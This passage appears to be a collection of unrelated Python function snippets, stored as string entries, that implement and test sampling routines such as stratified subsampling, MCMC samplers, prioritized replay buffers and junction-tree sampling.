statsFun.simpSample(nfun,n,nlim[0],nlim[1])\n self.assertGreaterEqual(nsample.min(), nlim[0])\n self.assertLessEqual(nsample.min(), nlim[1])\n\n self.assertGreaterEqual(scipy.stats.kstest(usample,'uniform')[1],0.01,'Uniform sample does not look uniform.')\n self.assertGreaterEqual(scipy.stats.kstest(nsample,'norm')[1],0.01,'Normal sample does not look normal.')\n self.assertLessEqual(scipy.stats.kstest(nsample,'uniform')[1],0.01,'Normal sample looks too uniform.')\n self.assertLessEqual(scipy.stats.kstest(usample,'norm')[1],0.01,'Uniform sample looks too normal.')", "def get_subsample_of_nodes(g, sampl=1):\n return sample(g.nodes(), int(len(g.nodes())*sampl))", "def adapted_rand(seg, gt, all_stats=False):\n # just to prevent division by 0\n epsilon = 1e-6\n\n # segA is truth, segB is query\n segA = np.ravel(gt)\n segB = np.ravel(seg)\n n = segA.size\n\n n_labels_A = np.amax(segA) + 1\n n_labels_B = np.amax(segB) + 1\n\n ones_data = np.ones(n)\n\n p_ij = sparse.csr_matrix((ones_data, (segA[:], segB[:])), shape=(n_labels_A, n_labels_B))\n\n a = p_ij[1:n_labels_A, :]\n b = p_ij[1:n_labels_A, 1:n_labels_B]\n c = p_ij[1:n_labels_A, 0].todense()\n d = b.multiply(b)\n\n a_i = np.array(a.sum(1))\n b_i = np.array(b.sum(0))\n\n sumA = np.sum(a_i * a_i)\n sumB = np.sum(b_i * b_i) + (np.sum(c) / n)\n sumAB = np.sum(d) + (np.sum(c) / n)\n\n precision = sumAB / max(sumB, epsilon)\n recall = sumAB / max(sumA, epsilon)\n\n fScore = 2.0 * precision * recall / max(precision + recall, epsilon)\n are = 1.0 - fScore\n\n if all_stats:\n return are, precision, recall\n else:\n return are", "def post(self, s):\n return np.random.choice(self.sample_list)", "def sample(self, s):\n rng = np.random.default_rng()\n return rng.choice(np.arange(self.n_actions), p=self.eval(s))", "def sampling(data,classes,others=None,portion=0.9,max_size_given=None,rng=np.random.RandomState(100)): \n u, indices = np.unique(classes,return_inverse=True)\n indices=np.asarray(indices)\n num_u=len(u)\n sample_sizes=[]\n \n # get sample size of each class\n for i in range(num_u):\n sample_size_this=np.sum(indices==i)\n sample_sizes.append(sample_size_this)\n sample_sizes=np.array(sample_sizes,dtype=int)\n sample_sizes=sample_sizes*portion\n sample_sizes=np.array(sample_sizes,dtype=int)\n # set a ceiling/limit\n if max_size_given is not None:\n sample_sizes[sample_sizes>max_size_given]=max_size_given \n\n indices_all=np.array([],dtype=indices.dtype)\n indices_range=np.array(range(len(indices)))\n\n # sampling\n for i in range(num_u):\n ind_this_num=indices_range[indices==i]\n ind_this_reduced=ind_this_num[rng.choice(len(ind_this_num),size=sample_sizes[i],replace=False)]\n indices_all=np.append(indices_all,ind_this_reduced)\n \n # reduce the data \n data=data[indices_all,:]\n classes=classes[indices_all]\n if np.any(others):\n others=others[indices_all]\n return data,classes,indices_all,others", "def generate_samples(self, n_samples):", "def generate_samples(self, n_samples):", "def stirling(k, r) :\n\n return sum((-1)**(r-i)*binomial(r, i)*i**k for i in range(r+1)) / math.factorial(r)", "def recursion_tree(self,node):\n if node.clades: # for non-leaf node\n tmp = 0\n flag = 0\n for clade in node.clades:\n if flag == 0:\n tmp = copy.copy(self.recursion_tree(clade).sample_series)\n else:\n tmp += self.recursion_tree(clade).sample_series \n flag = 1\n node.sample_series = tmp\n else: # leaf node which has been init above.\n try:\n a = node.sample_series\n #print(node.name +' is a leaf')\n except:\n print('please initialize the tree leaves by otu table.')\n return node", "def simple_sampler(fun, start, sigma, iterations, verbose=False):\n mean = np.zeros(len(start))\n cov = np.eye(len(start)) * sigma\n\n if isinstance(start, np.ndarray):\n previous = start\n else:\n previous = np.array(start)\n\n f_previous = fun(previous)\n\n samples = np.zeros((iterations, len(start)))\n acceptance = 0\n for i in range(iterations):\n proposal = previous + np.random.multivariate_normal(mean=mean, cov=cov)\n f_proposal = fun(proposal)\n fun(previous)\n if (np.log(np.random.rand())) < (f_proposal - f_previous):\n previous = proposal\n acceptance += 1\n samples[i] = np.array(previous)\n\n if verbose:\n print('sampler acceptance = {0:.3f}'.format(acceptance / iterations))\n\n return samples", "def search_tree_sample(variables, formula, samples):\n\n to_use = list(variables)\n used_vars = []\n solns = [None]\n\n while to_use != []:\n next_var = to_use[0]\n to_use = to_use[1:]\n\n solns = black_box_sample(formula, solns, samples, used_vars, next_var)\n used_vars.append(next_var)\n\n return uniform_select(solns)", "def easy_sample(self, num, **kwargs):\n return self.preprocess(self.sample(num, **kwargs), **kwargs)", "def sample_tree(self):\n logger.info('TreeCatTrainer.sample_tree given %d rows',\n len(self._added_rows))\n SERIES.sample_tree_num_rows.append(len(self._added_rows))\n complete_grid = self._tree.complete_grid\n edge_logits = self.compute_edge_logits()\n assert edge_logits.shape[0] == complete_grid.shape[1]\n assert edge_logits.dtype == np.float32\n edges = self.get_edges()\n edges = sample_tree(complete_grid, edge_logits, edges)\n return edges, edge_logits", "def populate_synthetic_tree(self):\r\n logging.debug('populating synthetic tree...')\r\n a_data = self.realData\r\n ndata = a_data.shape[1]\r\n for i in range(ndata):\r\n ptx = a_data[0, i]\r\n pty = a_data[1, i]\r\n leaf = self.root.find_subnode(ptx, pty)\r\n leaf.n_count += 1\r\n\r\n # traverse the tree and update leaf counts\r\n stack = deque()\r\n stack.append(self.root)\r\n while len(stack) > 0:\r\n cur_node = stack.popleft()\r\n if cur_node.n_isLeaf is True: # leaf\r\n cur_node.n_count += self.differ.getNoise(1, 0.5 * self.param.Eps)\r\n else:\r\n stack.append(cur_node.nw)\r\n stack.append(cur_node.ne)\r\n stack.append(cur_node.sw)\r\n stack.append(cur_node.se)", "def regular_subsample(neuron):\n # select all the main points\n selected_index = get_main_points(neuorn)\n\n # Computing the parent id of the selected nodes\n neuron = neuron_with_selected_nodes(selected_index)\n return neuron", "def test_decision_tree_min_samples_split_parameter(params, X_train, X_test, y_train, y_test):", "def samples(self, gp):\r\n orig_shape = gp.shape\r\n gp = gp.flatten()\r\n #FIXME: Very slow as we are computing a new random variable per input!\r\n #Can't get it to sample all at the same time\r\n #student_t_samples = np.array([stats.t.rvs(self.v, self.gp_link.transf(gpj),scale=np.sqrt(self.sigma2), size=1) for gpj in gp])\r\n dfs = np.ones_like(gp)*self.v\r\n scales = np.ones_like(gp)*np.sqrt(self.sigma2)\r\n student_t_samples = stats.t.rvs(dfs, loc=self.gp_link.transf(gp),\r\n scale=scales)\r\n return student_t_samples.reshape(orig_shape)", "def __init__(self, size = 1000, discard_sample = False, method = 'first'):\r\n super(SampleNode, self).__init__()\r\n self.size = size\r\n self.discard_sample = discard_sample\r\n self.method = method\r\n # random nodes need a stack to hold intermediate records\r\n if method == \"random\":\r\n self.stack = Stack(size)\r\n else:\r\n self.stack = None\r\n if method == \"percent\" and ((size>100) or (size<0)):\r\n raise ValueError, \"Sample size must be between 0 and 100 with 'percent' method.\"", "def reproduce(self):\n\n def compute_seeds(fitness):\n \"\"\" Computes the number of seeds given a fitness value. \"\"\"\n\n seeds = (fitness-min_fitness) / (max_fitness-min_fitness) * \\\n (self.max_seeds-self.min_seeds) + self.min_seeds\n\n return round(seeds)\n\n # evaluates max and min fitness for current year\n max_fitness = max(tree[0] for tree in self.population)\n min_fitness = min(tree[0] for tree in self.population)\n\n # computes the number of seeds produced per tree\n for tree in self.population:\n tree[1].seeds = int(compute_seeds(tree[0]))", "def _generate(self, **kwargs):\n N = self.parameter_schema['N']\n parameter_count = len(self._parameter_names)\n common_override_kwargs = {}\n override_kwargs = self._sampler_overrides(common_override_kwargs)\n if kwargs:\n kwargs.update(override_kwargs)\n else:\n kwargs = override_kwargs\n __import__(\"SALib.sample\", fromlist=[self.sampler_class])\n sampler = getattr(SALib.sample, self.sampler_class)\n problem = self.parameter_schema[\"problem\"]\n self._samples = sampler.sample(problem, N, **kwargs)\n self._samples = numpy.unique(self._samples, axis=0)\n super()._generate()", "def create_weighted_sampler(local_df, test_label = 'protease_stability'):\n all_label_ids = torch.tensor([x for x in local_df[test_label]], dtype=torch.long)\n labels_unique, counts = np.unique(local_df[test_label], return_counts=True)\n print(labels_unique)\n\n class_weights = [sum(counts)/c for c in counts]\n print(class_weights)\n\n weights = [class_weights[e] for e in local_df[test_label]]\n\n print(len(local_df[test_label]))\n sampler = data_utils.WeightedRandomSampler(weights, len(local_df[test_label]))\n return sampler", "def sample(\n self, n=None, weight_by_clusters=False, random_state=None, **kwargs\n ):\n\n if not isinstance(n, int):\n n = 1\n\n if isinstance(random_state, int):\n np.random.seed(random_state)\n\n # Sort by base 4 id\n if weight_by_clusters:\n df = self.weight_grids(**kwargs)\n else:\n df = self.to_frame()\n\n df = df.sort_values(by='id')\n\n npool = df.shape[0]\n interval = int(np.ceil(npool / n))\n\n # Get a random starting index\n start = np.random.randint(0, high=interval, size=1, dtype=int)[0]\n\n # Get the sample indices\n sample_indices = np.arange(start, npool, interval)\n\n # Get the random grids\n df_sample = df.iloc[sample_indices]\n\n sample_indices = []\n\n # Iterate over the selected grids,\n # get intersecting samples, and\n # select 1 sample within each grid.\n for row in df_sample.itertuples():\n\n # The grid bounds\n bbox = row.geometry.bounds\n\n # Points that intersect the current grid\n point_int = list(self.sindex.intersection(bbox))\n\n # Get one random point within the grid\n sample_indices.append(\n np.random.choice(point_int, size=1, replace=False)[0]\n )\n\n # Get the random points\n return self.dataframe.iloc[sample_indices]", "def __call__(self, params):\r\n return self.sample(params)", "def simple_stratify(df, statify_column, seed=0, ratios=None, verbose=False):\n if ratios == \"original\":\n return df\n else:\n np.random.seed(seed)\n vc = df[statify_column].value_counts()\n masks = [(df[statify_column] == v) for v in vc.index]\n sizes = list(vc)\n if not isinstance(ratios, (list, tuple)):\n if ratios:\n leftover = 1.0 - ratios\n ratios = [leftover / (vc.shape[0] - 1)] * (vc.shape[0] - 1) + [ratios]\n else:\n ratios = [1.0 / vc.shape[0]] * vc.shape[0]\n if len(ratios) == vc.shape[0]:\n tentative_sizes = np.array([n / alpha for n, alpha in zip(sizes, ratios)])\n else:\n print(\n \"ratios len does is not equal to the number of classes : \"\n \"len ratios {0}, value counts {1}\".format(len(ratios), vc.shape[0])\n )\n if verbose:\n print(\"ratios in the training : {0}\".format(ratios))\n optimal_index = np.argmin(tentative_sizes)\n size0 = tentative_sizes[optimal_index]\n new_sizes = [int(x * size0) for x in ratios]\n # size = np.sum(new_sizes)\n indices = [\n np.random.choice(actual, new_size, replace=False)\n for actual, new_size in zip(sizes, new_sizes)\n ]\n subdfs = [df.loc[m].iloc[ii] for m, ii in zip(masks, indices)]\n dfr = pd.concat(subdfs)\n return dfr", "def sample(self, n_samps):\n # print('gauss trying to sample '+str(n_samps)+' from '+str(self.dist))\n # xs = np.array([self.sample_one() for n in range(n_samps)])\n xs = np.array(self.dist.sample(n_samps))\n # print('gauss sampled '+str(n_samps)+' from '+str(self.dist))\n return xs", "def sample(self, batch_size):\n\n if self.tree.filled_size() < batch_size:\n return None, None, None\n\n out = []\n indices = []\n weights = []\n priorities = []\n i = 0\n while i < batch_size:\n r = random.random()\n data, priority, index = self.tree.find(r)\n if not data:\n continue\n priorities.append(priority)\n weights.append((1. / self.capacity / priority) ** self.beta if priority > 1e-16 else 0)\n indices.append(index)\n out.append(data)\n self.priority_update([index], [0]) # To avoid duplicating\n i += 1\n\n self.priority_update(indices, priorities) # Revert priorities\n\n weights = [w / max(weights) for w in weights] # Normalize for stability\n\n return out, weights, indices", "def _call(self, dataset):\n # first cast to floating point dtype, because noise is most likely\n # floating point as well and '+=' on int would not do the right thing\n # XXX should we already deepcopy here to keep orig dtype?\n if not N.issubdtype(dataset.samples.dtype, N.float):\n dataset.setSamplesDType('float32')\n\n if __debug__:\n nfeatures = dataset.nfeatures\n\n sens_map = []\n\n # compute the datameasure on the original dataset\n # this is used as a baseline\n orig_measure = self.__datameasure(dataset)\n\n # do for every _single_ feature in the dataset\n for feature in xrange(dataset.nfeatures):\n if __debug__:\n debug('PSA', \"Analyzing %i features: %i [%i%%]\" \\\n % (nfeatures,\n feature+1,\n float(feature+1)/nfeatures*100,), cr=True)\n\n # make a copy of the dataset to preserve data integrity\n wdata = deepcopy(dataset)\n\n # add noise to current feature\n wdata.samples[:, feature] += self.__noise(size=wdata.nsamples)\n\n # compute the datameasure on the perturbed dataset\n perturbed_measure = self.__datameasure(wdata)\n\n # difference from original datameasure is sensitivity\n sens_map.append(perturbed_measure - orig_measure)\n\n if __debug__:\n debug('PSA', '')\n\n return N.array(sens_map)", "def test_returns_densest(self, graph, monkeypatch):\n adj = (\n (0, 1, 0, 1, 1, 0),\n (1, 0, 1, 1, 1, 0),\n (0, 1, 0, 1, 0, 0),\n (1, 1, 1, 0, 1, 0),\n (1, 1, 0, 1, 0, 0),\n (0, 0, 0, 0, 0, 0),\n )\n graph = nx.Graph(\n 0.5 * np.array(adj)\n ) # multiply by 0.5 to follow weightings of adj fixture\n optimal_density = 1.0\n optimal_sample = [0, 1, 9, 16]\n graph = nx.relabel_nodes(graph, lambda x: x ** 2)\n\n with monkeypatch.context() as m:\n m.setattr(sample, \"sample_subgraphs\", self.sampler)\n # The monkeypatch above is not necessary given the one below, but simply serves to\n # speed up testing by not requiring a call to ``sample_subgraphs``, which is a\n # bottleneck\n\n m.setattr(resize, \"resize_subgraphs\", self.sampler)\n\n result = dense.random_search(graph=graph, nodes=4, iterations=10)\n\n assert result == (optimal_density, optimal_sample)", "def spheroid_sample():\n DIMENSIONS = 10\n N_SAMPLES = 50*DIMENSIONS\n problem = problems.SpheroidProblem()\n\n representation = Representation(\n initialize=initializers.create_real_vector(bounds=[(-5.12, 5.12)]*DIMENSIONS)\n )\n\n initial_sample = representation.create_population(N_SAMPLES, problem)\n Individual.evaluate_population(initial_sample)\n\n return problem, representation, initial_sample", "def score_samples(self, X):\n ...", "def test_score_with_sample_weights():\n atom = ATOMClassifier(X_bin, y_bin, random_state=1)\n atom.run(\"Tree\")\n score = atom.tree.score(X_bin, y_bin, sample_weight=list(range(len(y_bin))))\n assert isinstance(score, np.float64)", "def test_simpSample_trivial(self):\n\n ulim = [0,1]\n ufun = lambda x: 1.0/np.diff(ulim)\n\n n = 10000\n sample = statsFun.simpSample(ufun,n,0.5,0.5)\n\n self.assertEqual(len(sample),n)\n self.assertTrue(np.all(sample == 0.5))", "def _sample_synthetic(self, X):\n n_samples = X.shape[0]\n self.y = np.concatenate((np.ones(n_samples), np.zeros(n_samples)))\n \n random_state = _forest.check_random_state(self.random_state) \n\n X_synth = np.asarray([np.apply_along_axis(random_state.choice, 0, X) for _ in range(n_samples)])\n self.X = np.concatenate((X, X_synth))\n\n return self.X, self.y", "def sample(self):\n x = self.state\n# dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n dx = self.theta * (self.mu - x) + self.sigma * np.random.standard_normal(self.size)\n self.state = x + dx\n return self.state", "def sampler(self, *args, **kwargs):\n\n return (samples_subgraphs ** 2).tolist()", "def test_weighted_consensus_from_scored_trees_collection(self):\n sct = LogLikelihoodScoredTreeCollection(self.scored_trees)\n ct = sct.getConsensusTree()\n self.assertTrue(ct.sameTopology(Tree(\"((a,b),(c,d));\")))", "def sample(self, x):", "def sample_path_len(self,num_samp=0x200):\n sum_finger_path = 0.0\n\n # We don't want to sample more than the total amount of nodes:\n num_samp = min([num_samp,self.num_nodes])\n\n snodes = random.sample(self.nodes,num_samp)\n for sn in snodes:\n for f in SUCC_FINGERS:\n sum_finger_path += sn.get_best_succ_finger(f).path_len\n for f in PRED_FINGERS:\n sum_finger_path += sn.get_best_pred_finger(f).path_len\n\n num_fingers = len(SUCC_FINGERS) + len(PRED_FINGERS)\n return sum_finger_path/(num_samp * num_fingers)", "def _choose_sample(self):\n\n \t #periodically generate a new reconstruction for the purposes of sampling", "def random_subsample(neuron, num):\n\n I = np.arange(neuron.n_soma, neuron.n_node)\n np.random.shuffle(I)\n selected_index = I[0:num - 1]\n selected_index = np.union1d([0], selected_index)\n selected_index = selected_index.astype(int)\n selected_index = np.unique(np.sort(selected_index))\n\n return neuron_with_selected_nodes(neuron, selected_index)", "def balanced_subsample(y, s):\n sample = []\n # For every label in the dataset\n for label in np.unique(y):\n # Get the index of all images with a specific label\n images = np.where(y==label)[0]\n # Draw a random sample from the images\n random_sample = np.random.choice(images, size=s, replace=False)\n # Add the random sample to our subsample list\n sample += random_sample.tolist()\n return sample", "def sorted_stratified_train_test_split(collated_df, test_size=0.2):\n\n collated_df = collated_df[collated_df['GOOD'] == 1]\n collated_df['MUL'] = collated_df['HEART_RATE_BPM'] * collated_df['RESP_RATE_BR_PM']\n collated_df = collated_df.sort_values(['MUL'], ascending=[False])\n rows = collated_df.values.tolist() \n n_test = int(round(len(collated_df)*test_size))\n\n #delegates = []\n #subject_set = set()\n\n #for row in rows:\n # subject = row[0]\n # if subject not in subject_set:\n # delegates.append(subject)\n # subject_set |= set([subject])\n \n #n_test = int(round(len(subject_set)*test_size))\n #tiers = tiers_by_magnitude(delegates, n_tier=n_test) \n\n tiers = tiers_by_magnitude(rows, n_tier=n_test)\n X_test = []\n while n_test != 0:\n for T in tiers:\n samp = T.pop(random.randint(0, len(T) - 1))\n X_test.append(samp[:2])\n n_test -= 1\n\n return X_test", "def sample(self, n):\n raise NotImplementedError", "def initial_sampling(self, params):\n i = params\n theta_star = self.priors_sample()\n model = self.simz( theta_star )\n rho = test_dist(self.data, model)\n while rho > self.eps0: \n theta_star = self.priors_sample()\n model = self.simz( theta_star )\n rho = test_dist(self.data, model)\n data_list = [np.int(i)]\n\n for i_param in xrange(self.n_params): \n data_list.append(theta_star[i_param])\n data_list.append(1./np.float(self.N))\n data_list.append(rho)\n\treturn np.array(data_list)", "def get_collapsed_stochastic_test_sample(self, x, reuse=False):\n\t\tprint('TEST: implicitly flipping individual bits with probability {}'.format(self.test_noise))\n\t\tdset_name = self.datasource.target_dataset\n\t\tif dset_name in ['mnist', 'BinaryMNIST', 'omniglot', 'random']:\n\t\t\tmean = self.encoder(x, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'cifar10':\n\t\t\tmean = self.cifar10_convolutional_encoder(x, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'svhn':\n\t\t\tmean = self.convolutional_32_encoder(x, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'celebA':\n\t\t\tmean = self.complex_encoder(x, reuse=tf.AUTO_REUSE)\n\t\telse:\n\t\t\tprint('dataset {} is not supported!'.format(dset_name))\n\t\t\traise NotImplementedError\n\n\t\t# for downstream classification\n\t\tclassif_q = Bernoulli(logits=mean)\n\t\tclassif_y = tf.cast(classif_q.sample(), tf.float32)\n\n\t\t# test BSC\n\t\tif self.noise != 0:\n\t\t\ty_hat_prob = tf.nn.sigmoid(mean)\n\t\t\ttotal_prob = y_hat_prob - (2 * y_hat_prob * self.test_noise) + self.test_noise\n\t\t\tq = Bernoulli(probs=total_prob)\n\t\telse:\n\t\t\tprint('no additional channel noise; feeding in logits for latent q_phi(z|x) to avoid numerical issues')\n\t\t\ttotal_prob = tf.nn.sigmoid(mean)\n\t\t\tq = Bernoulli(logits=mean)\n\n\t\ty = tf.cast(q.sample(), tf.float32)\n\t\tif dset_name in ['mnist', 'BinaryMNIST', 'omniglot', 'random']:\n\t\t\tx_reconstr_logits = self.decoder(y, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'cifar10':\n\t\t\tx_reconstr_logits = self.cifar10_convolutional_decoder(y, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'svhn':\n\t\t\tx_reconstr_logits = self.convolutional_32_decoder(y, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'celebA':\n\t\t\tx_reconstr_logits = self.complex_decoder(y, reuse=tf.AUTO_REUSE)\n\t\telse:\n\t\t\tprint('dataset {} is not supported!'.format(dset_name))\n\t\t\traise NotImplementedError\n\n\t\treturn total_prob, y, classif_y, q, x_reconstr_logits", "def sampling(args):\n t_mean, t_log_var = args\n # YOUR CODE HERE\n epsilon = K.random_normal(t_mean.shape)\n z = epsilon * K.exp(0.5 * t_log_var) + t_mean\n return z", "def test_000_basic_functionality() -> None:\n df = generate_test_data()\n skim(df)", "def create_samples(self, skills_sample_fraction=1.0, users_sample_fraction=1.0):\n # Sampling\n self.sample_skills_to_be_covered(skills_sample_fraction)\n self.sample_users(users_sample_fraction)", "def apply():\r\n result = dataSampling(str, \"hhhhhhahhhhhahhahahahahhahahha\", 5)\r\n final_res = dataScreening(result, \"ha\")\r\n print(final_res)", "def uniformSample (self) :\n S = self.mdp.S\n A = self.mdp.A\n\n for s, a in product(range(S), range(A)):\n s_, self.R[s, a] = self.mdp.step(s, a)\n self.updateVisitStatistics(s, a, s_)", "def _partial_fit(self, X, y, weight):\n\n self.samples_seen += weight\n self.sum_of_values += weight * y\n self.sum_of_squares += weight * y * y\n\n try:\n self.sum_of_attribute_values += weight * X\n self.sum_of_attribute_squares += weight * X * X\n except ValueError:\n\n self.sum_of_attribute_values = weight * X\n self.sum_of_attribute_squares = weight * X * X\n\n if self._tree_root is None:\n self._tree_root = self._new_learning_node()\n self._active_leaf_node_cnt = 1\n self._tree_root.learn_one(X, y, weight, self, None, -1)", "def sample_cond_on_subtree_nodes(new, tree, subtree_nodes, subtree_edges, subtree_adjlist):\n new_separators = {}\n new_cliques = set()\n old_cliques = set()\n subtree_order = len(subtree_nodes)\n #print(\"subtree nodes:\" + str(subtree_nodes))\n\n if subtree_order == 0:\n # If the tree, tree is empty (n isolated node),\n # add random neighbor.\n c = frozenset([new])\n new_cliques.add(c)\n #c2 = tree.nodes()[0] # nx 1.9\n c2 = list(tree.nodes())[0] # GraphTool\n #c2 = list(tree.nodes)[0] # nx 2.1\n tree.add_node(c, label=tuple([new]), color=\"red\")\n tree.add_edge(c, c2, label=tuple([]))\n\n sep = frozenset()\n #tree.fix_graph()\n trilearn.graph.junction_tree.randomize_at_sep(tree, sep)\n\n new_separators[sep] = [(c, c2)]\n # tree TODO: the actual value for the key is not needed.\n P = {c: np.exp(-tree.log_nu(sep))}\n return (old_cliques, new_cliques, new_separators, P, {c: 1.0})\n\n S = {c: set() for c in subtree_nodes}\n M = {c: set() for c in subtree_nodes}\n for c in S:\n for neig in subtree_adjlist[c]:\n #S[c] = S[c] | (c & neig)\n S[c] |= (c & neig)\n RM = {c: c - S[c] for c in S}\n C = {c: set() for c in subtree_nodes}\n P = {}\n N_S = {c: set() for c in subtree_nodes}\n\n sepCondition = {}\n for c in RM:\n sepCondition[c] = len({neig for neig in subtree_adjlist[c] if\n S[c] == neig & c}) > 0 or len(subtree_adjlist) == 1\n\n if sepCondition[c] is True:\n tmp = np.array(list(RM[c]))\n first_node = []\n if len(tmp) > 0:\n # Connect to one node\n first_ind = np.random.randint(len(tmp))\n first_node = tmp[[first_ind]]\n tmp = np.delete(tmp, first_ind)\n\n rest = set()\n if len(tmp) > 0:\n # Connect to the rest of the nodes if there are any left\n rest = aux.random_subset(tmp)\n M[c] = frozenset(rest | set(first_node))\n else:\n M[c] = frozenset(aux.random_subset(RM[c]))\n\n # Create the new cliques\n for clique in M:\n C[clique] = frozenset(M[clique] | S[clique] | {new})\n new_cliques.add(C[clique])\n\n # Get the neighbor set of each c which can be moved to C[c]\n for clique in subtree_nodes:\n N_S[clique] = {neig for neig in tree.neighbors(clique)\n if neig & clique <= C[clique] and neig not in subtree_nodes}\n\n # Add the new cliques\n #for c in subtree_nodes:\n # tree.add_node(C[c], label=str(tuple(C[c])), color=\"red\")\n tree.add_nodes_from([C[c] for c in subtree_nodes])\n\n # Construct and add the new edges between the new cliques,\n # replicating the subtree\n new_subtree_edges = []\n for e in subtree_edges:\n sep = C[e[0]] & C[e[1]]\n if not sep in new_separators:\n new_separators[sep] = []\n new_separators[sep].append((C[e[0]], C[e[1]]))\n #new_subtree_edges.append((C[e[0]], C[e[1]]))\n tree.add_edge(C[e[0]], C[e[1]])\n # tree.add_edges_from(new_subtree_edges)\n\n # Connect cliques in the subtree to the new cliques\n for c in subtree_nodes:\n # Move the neighbors of a swallowed node to the swallowing node\n # Remove the swallowed node\n\n if C[c] - {new} == c:\n # If connecting to all nodes in a clique (the node should be replaces instead)\n for neig in tree.neighbors(c):\n if neig not in subtree_nodes:\n tree.add_edge(C[c], neig)#, label=lab)\n\n tree.remove_node(c)\n old_cliques.add(c)\n else: # If not connecting to every node in a clique\n sep = C[c] & c\n if not sep in new_separators:\n new_separators[sep] = []\n new_separators[sep].append((C[c], c))\n\n #print \"adding edge: \" + str((C[c], c))\n tree.add_edge(C[c], c)\n # Pick random subset of neighbors intersecting with subset of S U M\n\n N = aux.random_subset(N_S[c])\n #for neig in N:\n # tree.add_edge(C[c], neig)\n\n tree.add_edges_from([(C[c], neig) for neig in N])\n tree.remove_edges_from([(c, neig) for neig in N])\n\n # Compute probabilities\n N = {}\n for c in subtree_nodes:\n if sepCondition[c] is False:\n # Every internal node in c belongs to a separator\n P[c] = np.power(2.0, - len(RM[c]))\n #P[c] = Fraction(1, 2 ** len(RM[c]))\n if not len(c) + 1 == len(C[c]):\n N[c] = np.power(2.0, - len(N_S[c]))\n #N[c] = Fraction(1, 2 ** len(N_S[c]))\n else:\n N[c] = 1.0\n #N[c] = Fraction(1,1)\n else:\n P[c] = 1.0\n #P[c] = Fraction(1, 1)\n N[c] = 1.0\n #N[c] = Fraction(1, 1)\n if len(RM[c]) > 1:\n P[c] = 1.0 / len(RM[c])\n #P[c] = Fraction(1, len(RM[c]))\n P[c] *= np.power(2.0, - (len(RM[c]) - 1.0)) * len(M[c])\n #P[c] *= Fraction(len(M[c]), 2 ** (len(RM[c]) - 1.0)) \n if not len(c) + 1 == len(C[c]): # c not swallowed by C[c]\n #N[c] = np.power(2.0, - len(N_S[c]))\n N[c] = Fraction(1, 2 ** len(N_S[c]))\n\n # Remove the edges in tree\n tree.remove_edges_from(subtree_edges)\n # Todo: This will introduce a bug if we instead replace a node.\n return (old_cliques, new_cliques, new_separators, P, N)", "def test_subsample_taxonomy(self):\n basic_test_runner(self, 'taxonomy', nrows=6, niter=3, normalize='subsample')", "def sampling_class_portion(data,classes,others=None,class_portion=None,rng=np.random.RandomState(100)):\n u, indices = np.unique(classes,return_inverse=True)\n indices=np.asarray(indices)\n num_u=len(u)\n sample_sizes=dict()\n \n # get sample size of each class\n size_min=float(\"inf\")\n for i in range(num_u):\n sample_size_this=np.sum(indices==i)\n sample_sizes[u[i]]=sample_size_this\n if class_portion[u[i]]==1 and sample_size_this<size_min:\n size_min=sample_size_this\n print(size_min)\n\n indices_all=np.array([],dtype=indices.dtype)\n indices_range=np.array(range(len(indices)))\n \n # sampling\n for i in range(num_u):\n ind_this_num=indices_range[indices==i]\n replacetf=True if sample_sizes[u[i]]<(size_min*class_portion[u[i]]) else False\n ind_this_reduced=ind_this_num[rng.choice(sample_sizes[u[i]],size=size_min*class_portion[u[i]],replace=replacetf)]\n indices_all=np.append(indices_all,ind_this_reduced)\n \n # get the sampled data \n data=data[indices_all,:]\n classes=classes[indices_all]\n if np.any(others):\n others=others[indices_all]\n return data,classes,indices_all,others", "def sample(self):", "def calculate_sample_silhouette(self):\n sum_samples = 0\n for cluster in self.cluster_lst:\n sum_samples += self.sum_silhouette(cluster)\n sample_size = len(self.samples)\n return sum_samples/sample_size", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n # dx = self.theta * (self.mu - x) + self.sigma * np.random.standard_normal(self.size)\n self.state = x + dx\n return self.state", "def sample(self, n=1):\n raise NotImplementedError", "def run_suite(strategy):\n \n # create a TestSuite object\n suite = poc_simpletest.TestSuite()\n \n # test gen_all_holds on various inputs\n hand = (1,)\n num_sides = 6\n suite.run_test(strategy(hand, num_sides), (3.5, ()), \"Test #1:\")\n\n suite.report_results()", "def sample(self, batch_size):\n # get the sum of priorities\n priority_sum = self.sum_tree.get_sum_priority()\n # sample priorities \n priorities_to_sample = np.random.uniform(0, priority_sum, batch_size)\n # get the indexes of replays\n sample_idxes = [self.sum_tree.get(x) for x in priorities_to_sample]\n # fetch the transitions and prepare the batch for training\n random_sample = [self.queue[x] for x in sample_idxes]\n # zip\n zipped = [ torch.from_numpy( np.asarray(arr).astype(np.float32) ).float() for arr in zip(*random_sample) ]\n sample = Transition( zipped[0], zipped[1].unsqueeze_(-1).long(), zipped[2].unsqueeze_(-1), zipped[3], zipped[4].unsqueeze_(-1).byte() )\n return sample, sample_idxes", "def sample_size_strat(method):\n N = 1000\n major = [value for value in range(10, 15, 2)]\n repetitions = 100\n\n p_samples = [] \n pandas_y_values = []\n pandas_x_values = []\n \n var = []\n var_strat = []\n\n for m in major:\n samples = m * m\n var1 = []\n var2_strat = []\n\n for i in range(repetitions):\n result = compute_area_mandelbrot(N, 2, samples, method)\n p_samples.append(method)\n pandas_x_values.append(str(samples))\n pandas_y_values.append(result[2])\n var1.append(result[2])\n\n result = compute_area_mandelbrot(N, 2, samples, \"Stratified Random\")\n var2_strat.append(result[2])\n p_samples.append(\"Stratified\")\n pandas_x_values.append(str(samples))\n pandas_y_values.append(result[2])\n \n var.append(var1)\n var_strat.append(var2_strat)\n\n for i in range(len(var)):\n variation = np.var(var[i])\n variation_strat = np.var(var_strat[i])\n print(\"var at sample size:\", major[i]**2)\n print(\"Area means:\", np.mean(var[i]), np.mean(var_strat[i]))\n print(f\"var {method}:\", variation)\n print(\"var stratified:\", variation_strat)\n print(f\"var {method} / Stratified = \", variation / variation_strat)\n print(\"If value is positive than anti variance is smaller\")\n \n # Create an array with the colors you want to use\n data = {'Sample size':pandas_x_values, 'Area':pandas_y_values, 'Sampling method':p_samples} \n\n sns.set(font_scale=1.1)\n\n # Create DataFrame\n df = 